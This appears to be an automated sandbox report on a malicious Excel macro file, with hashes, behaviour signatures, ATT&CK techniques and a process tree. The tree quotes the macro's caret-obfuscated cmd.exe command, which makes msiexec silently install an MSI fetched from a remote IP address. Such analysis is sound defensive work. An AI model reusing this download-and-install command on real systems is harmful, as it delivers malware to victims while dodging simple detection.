Overview

overview

10

Static

static

8

SecuriteIn...77.xls

windows7_x64

10

SecuriteIn...77.xls

windows10_x64

10

Analysis

  • max time kernel
    138s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    30-06-2020 17:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls

  • Size

    172KB

  • MD5

    ac016bd363b76505c4b5f55fa92bf343

  • SHA1

    245a98cac3ab0bb615aa265c2774e34c1fcf2bd3

  • SHA256

    95bd7a62ced0c80358c8e3fd12bb8acb9aecea2b35fa43e7a343cb38ae233e5f

  • SHA512

    812ed62c7379e690f3e9af0cde79d1e38e5ed0971f98f0662584ea885e03bc8b36e31dfc7c54a2be2f5989605ff59e6d53a4e4b7f875fff0f8ac9dc40bdbb7c2

Score
10/10

Malware Config

Signatures

  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Use of msiexec (install) with remote resource 1 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:1628
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ms^iE^x^ec /i http://199.195.250.60/gg/new-order0456.msi /qn
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4036
      • C:\Windows\system32\msiexec.exe
        msiExec /i http://199.195.250.60/gg/new-order0456.msi /qn
        3⤵
        • Use of msiexec (install) with remote resource
        • Suspicious use of AdjustPrivilegeToken
        PID:4064
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blacklisted process makes network request
    • Suspicious use of AdjustPrivilegeToken
    PID:3544

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4036-3-0x0000000000000000-mapping.dmp
    Download
  • memory/4064-4-0x0000000000000000-mapping.dmp
    Download
  • memory/4064-5-0x00000281B1190000-0x00000281B1194000-memory.dmp
    Filesize

    16KB

    Download